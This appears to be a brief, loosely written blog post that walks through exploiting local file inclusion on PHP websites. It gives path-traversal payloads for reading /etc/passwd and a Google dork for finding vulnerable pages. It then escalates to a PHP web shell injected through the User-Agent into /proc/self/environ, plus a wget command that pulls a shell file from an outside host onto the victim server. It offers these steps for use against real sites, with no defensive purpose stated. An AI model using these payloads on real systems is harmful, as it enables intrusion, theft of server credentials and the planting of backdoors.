LFI- local file inclusion
To see if a script is vulnerable to local file inclusion,
index.php?page=../../../../../../../../../etc/passwd
That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.
google dork: inurl:.php?page=
example:www.xxx.com/contacts.php?page=abc.php
test:www.xxx.com/contacts.php?page=../xyz.php
now in linux server server there is etc/password
1... www.xyz.com/index
../
=../../../etc/passwd
=../../../etc/passwd%00
etc/passwdfile (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable
proc/self/environ
add one- user agent switcher
config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php
config.php
ip
username
pwd
Done..
Post a Comment